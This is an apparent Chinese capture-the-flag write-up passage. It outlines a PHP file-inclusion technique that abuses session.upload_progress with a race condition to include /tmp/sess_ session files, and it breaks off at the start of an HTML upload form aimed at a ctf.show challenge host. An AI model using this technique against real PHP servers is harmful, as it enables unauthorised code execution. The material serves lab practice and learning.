知识点:
- 利用
session.upload_progress
进行文件包含 - 条件竞争
思路就是通过上传PHP_SESSION_UPLOAD_PROGRESS
来访问/tmp/sess_xxx
,从而进行文件包含
原理可以看这篇文章利用session.upload_progress进行文件包含和反序列化渗透
其中主要的几点
首先上传PHP_SESSION_UPLOAD_PROGRESS
,代码如下
<!DOCTYPE html>
<html>
<body>
<form action="http://ed5a888e-8a6b-4e9f-9f47-0d3922ca327d.chall.ctf.show/"